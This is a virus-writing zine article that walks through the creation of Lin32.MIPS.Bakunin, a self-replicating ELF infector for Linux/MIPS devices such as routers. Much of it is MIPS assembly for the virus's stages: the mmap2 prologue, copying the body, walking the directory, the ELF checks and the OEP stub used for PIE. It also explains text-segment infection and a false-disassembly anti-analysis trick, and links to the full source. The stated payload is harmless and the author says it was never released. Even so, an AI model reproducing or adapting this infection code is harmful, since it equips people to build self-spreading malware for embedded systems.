┌───────────────────────┐
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ │
│ █ █ █ █ █ █ │
│ █ █ █ █ █▀▀▀▀ │
│ █ █ █ █ ▄ │
│ ▄▄▄▄▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄ ▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄▄▄▄▄ │
│ █ │
Writing Viruses In MIPS Assembly For Fun (And No Profit) │ █ │
~ S01den └───────────────────█ ──┘
Lovely written by S01den, from the tmp.0ut crew !
01/2021
+----------- Contact -----------+
| twitter: @s01den |
| mail: S01den@protonmail.com |
+-------------------------------+
.---\ Introduction /---.
In this short(?) paper, I will explain to you how I wrote Lin32.MIPS.Bakunin[0], my
first virus targeting Linux/MIPS systems (such as routers, IoT stuff or video game
consoles) in pure MIPS assembly. Obviously I didn't and I won't spread it into the
wild. Don't do that stupid thing neither.
I used some fun tricks which I want to develop here, such as computing the Original
Entry Point of an host despite PIE, obfuscating the main part of the virus by fucking
up alignment with just few bytes, and more surprises!
Before anything, let's summarize the basic features of Bakunin:
- Infect all the ELF in the current directory, PIE or not, thanks to the Silvio
Cesare's text infection method[1] (modify the text segment definition to make it
able to host the virus code)
- Uses a simple but powerful Anti Reverse-Engineering technique, the false
disassembly[2]
- Prints "X_X" (really great payload as you can see)
- It was a great anarchist philosopher <-- Not THIS Bakunin...
Now that you're hyped, we can start to dig into the Lin32.MIPS.Bakunin source code!
TW: A lot of dirty MIPS code. Take care of your eyes...
.---\ Implementing the false-disassembly technique in /---.
\ MIPS assembly: Coding the Prologue /
Before anything, I want to shortly explain what is false-disassembly.
This anti-RE technique consists simply in fucking up alignment by harcoding the first
bytes (here, the first 3 bytes) of an instruction. Thus, the disassembler will
interpret thoses "ghost" bytes as the beginning of an instruction, and complete it
with the firsts bytes of the next instruction. This will fuck up all the alignment
and can make a lot of instructions looking absurd.
For example (not from my virus):
-------------------- cut-here --------------------
jmp hey+2 # to jump over the ghost bytes
hey: hey:
xor %rbx, %rbx .ascii "\x48\x31"
jmp yo ====> xor %rbx, %rbx
jmp yo
---------------------------------------------------
Now, if we look at the disassembled code of those two codes we would have something
like this (radare2 ftw):
-------------------- cut-here --------------------
;-- hey:
0x00401002 4831db xor rbx, rbx
0x00401005 eb02 jmp 0x401009
||
\/
;-- hey:
0x00401002 48314831 xor qword [rax + 0x31], rcx
0x00401006 dbeb fucomi st(3)
0x00401008 026631 add ah, byte [rsi + 0x31]
---------------------------------------------------
This is very powerful for the MIPS architecture because all the instructions are made
of the same number of bytes, which is 4, so that addresses of instructions are
aligned to be a multiple of 4 (they end by 0x0, 0x4, 0x8 or 0xc).
So that we don't even have to put meaningful ghost bytes, we can put any byte we want
because the alignment will be fucked up anyway:
0x004000b3 unaligned
0x004000b4 fc004003 invalid
0x004000b8 a0182523 sb t8, 0x2523(zero)
0x004000bc bdf00003 cache 0x10, 3(t7)
0x004000c0 a0202524 sb zero, 0x2524(at)
0x004000c4 0500ff24 bltz t0, 0x3ffd58
0x004000c8 02106b00 invalid
0x004000cc 00000c03 sra at, zero, 0x10
0x004000d0 a0202524 sb zero, 0x2524(at)
0x004000d4 05000024 bltz t0, 0x400168
...
Just garbage as you can see :)
However, in MIPS assembly we can't jump anywhere, we have to jump on an address
multiple of 4 because of the alignment.
That's why I divided the virus in two parts: the prologue and the body.
The prologue is constituted of a mmap2 syscall, preparing an executable area in
memory where we will copy (thanks to the .get_vx routine which follows) the body
code, which is unaligned, to be then able to jump in. In other words, we're
restoring alignment to be able to execute those instructions.
--= call the mmap2 syscall =--
# I didn't know how to pass more than 4 arguments (the registers $a0...$a3),
# so I made a simple program which use mmap(), I statically linked it
# and disassembled it to see how mmap was called, that's where I've got
# the 3 following lines
sw $zero,20($sp)
li $v0,0
sw $v0,16($sp)
li $a0, 0
li $a1, 0x6a8 # the full virus size
li $a2, 7 # PROT_READ|PROT_WRITE|PROT_EXEC
li $a3, 0x0802 # MAP_ANONYMOUS | MAP_PRIVATE
li $v0, 4210 # sys_mmap2
syscall
------------------------------
This just stands for:
mmap2(NULL, 0x6a8, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0);
Once we've got a memory area allocated, we grab the code of the virus body (after the
false disassembly bytes) to copy it in.
--= Copying the virus body =--
bgezal $zero, get_pc # we grab the code by directly accessing the addresses of
# instructions
add $t1, $t1, 0x6f # 0x6f = the number of bytes to reach the body,
# now $t1 contains the addr of the body
move $t2, $v0 # $t2 now contains the addr we've just mmaped
li $t0, 0 # $t0 will be our counter
.get_vx:
lb $t3, 0($t1) # we put the current grabbed byte into $t3
sb $t3, 0($t2) # and we write this byte at the area pointed by $t2
addi $t0, $t0, 1
addi $t1, $t1, 1
addi $t2, $t2, 1
blt $t0, 0x615, .get_vx # there is 0x615 bytes in the body
jal $v0 # jump to the mmaped region
beq $zero, $zero, eof # the body will jump here after executing the payload
get_pc: # moving the saved eip (or pc in MIPS) in $t1
move $t1, $ra
jr $ra
---------------------------------
note: we use intructions such as beq or bgezal because we have to use relative jumps
in viruses (otherwise they wouldn't work in infected binaries) but classic jump
instructions (such as j or jal) are absolute...
The end of the prologue is only constituted of a call to sys_exit and a padding to
make room for 9 instructions (the eof routine will be rewritten during the infection
by the code permitting to compute the OEP despite PIE), and by .ascii "\xeb\x01\xe8",
the ghost bytes which fuck up the alignment of the body code.
.---\ Infecting the whole directory: Coding the Body /---.
Now we are in the body, we can do classic virus stuff.
To be able to infect binaries, a virus has to grab the list of the potential hosts
in the current directory.
We firstly get the name of the current dir thanks to a sys_getcwd syscall, then we
can open it through a sys_open syscall.
Once the directory is opened, we use the sys_getdents64 syscall to get a structure
containing the filenames of the file present in the dir.
We simply parse it with the following routine:
--= Parsing the dirent structure =--
li $s0, 0 # s0 will be our counter
parse_dir:
move $s2, $sp # s2 will contain the address of the filename
addi $s2, $s2, 0x13 # d_name
li $t1, 0
addi $t1, $sp, 0x12
lb $t1, 0($t1) # t1 now contains the type of the entry (file or dir)
bgezal $zero, infect
li $t9, 0
# get d_reclen (see the organization of the dirent64 structure...)
addi $t9, $sp, 0x10
lb $t0, 1($t9)
# buffer position += d_reclen
add $s0, $s0, $t0
add $sp, $sp, $t0
blt $s0, $s1, parse_dir # if counter < nbr of entries : jmp to parse_dir
------------------------------------
Then, we open each of these files, and mmap them this way:
mmap2(NULL, len_file, PROT_WRITE|PROT_EXEC, MAP_SHARED, fd, 0)
and we check if they are able to host the virus:
--= S0me checks =--
# $s5 contains the addr of the mmaped area
.check_magic:
lw $t0, 0($s5)
li $t1, 0x7f454c46 # check if the file is an ELF (by checking the magic bytes)
bne $t0, $t1, end
.check_bits:
lb $t0, 4($s5)
bne $t0, 1, end # here, we check e_ident[EI_CLASS], to know if the ELF we're
# trying to infect is 32 or 64 bit (if it's 64 bit, goto end)
.check_signature:
lw $t0, 9($s5) # the signature is located in e_hdr.padding, such as in
# Lin64.Kropotkine[3]
beq $t0, 0xdeadc0de, end
----------------------
Then, if we're still here, we can infect the file.
We use the silvio's infection technique:
"To insert code at the end of the text segment thus leaves us with the following
to do so far.
* Increase p_shoff to account for the new code in the ELF header
* Locate the text segment program header
* Increase p_filesz to account for the new code
* Increase p_memsz to account for the new code
* For each phdr who's segment is after the insertion (text segment)
* increase p_offset to reflect the new position after insertion
* For each shdr who's section resides after the insertion
* Increase sh_offset to account for the new code
* Physically insert the new code into the file - text segment p_offset
+ p_filesz (original)"[1]
The infection routine is pretty long and I widely commented it, so I won't explain
here my code point by point.
Just keep in mind that we first have to write the prologue. Because we're in the
mmaped area, we can't grab it as we did for the body (because the prologue isn't in
the mmaped area), so I hardcoded it... (see the lines 366 to 446)
After copying the hardcoded prologue, we write the code (again hardcoded) to compute
the OEP. I used the same method as in my Lin64.Kropotkine[3], (the Elf_master's
technique to resolve OEP despite PIE[4]).
It consists simply of doing this operation:
get_rip() - number_of_bytes_before - new_EP + original-e_hdr.entry
Here is the MIPS code to achieve this calculus:
------------------- the code to hardcode -------------------
0411fff5 bal get_pc
00000000 nop
2129fc70 addi t1, t1, -0x74 # substract the number of bytes before
# this instruction
3401dead ori at, zero, new_EP
01214822 sub t1, t1, at
2129beef addi t1, t1, OEP
0060e825 move sp, v1 # restore the original stack
01200008 jr t1 # jump to the computed OEP
------------------------------------------------------------
Then, we can write the body into the host, apply changes (with sys_msync and
sys_munmap) and finally close the file, to try to infect another one.
After infecting the whole directory, we just execute the payload ("X_X") and
finally exit!
.---\ Conclusion /---.
I hope you enjoyed this paper! I learned a lot by writing this virus, I've never
written anything in MIPS assembly before...
I hope you learned as much as I learned by working on this virus during two months.
.---\ Notes and References /---.
[0] the location of the source code
[1] Silvio's paper about infection
http://ivanlef0u.fr/repo/madchat/vxdevl/vdat/tuunix02.htm
[2] http://www.ouah.org/linux-anti-debugging.txt
[3] https://github.com/vxunderground/MalwareSourceCode
/blob/main/VXUG/Linux.Kropotkine.asm
[4] https://bitlackeys.org/papers/pocorgtfo20.pdf
...
--- Source ---
- Linux.Bak0unin.asm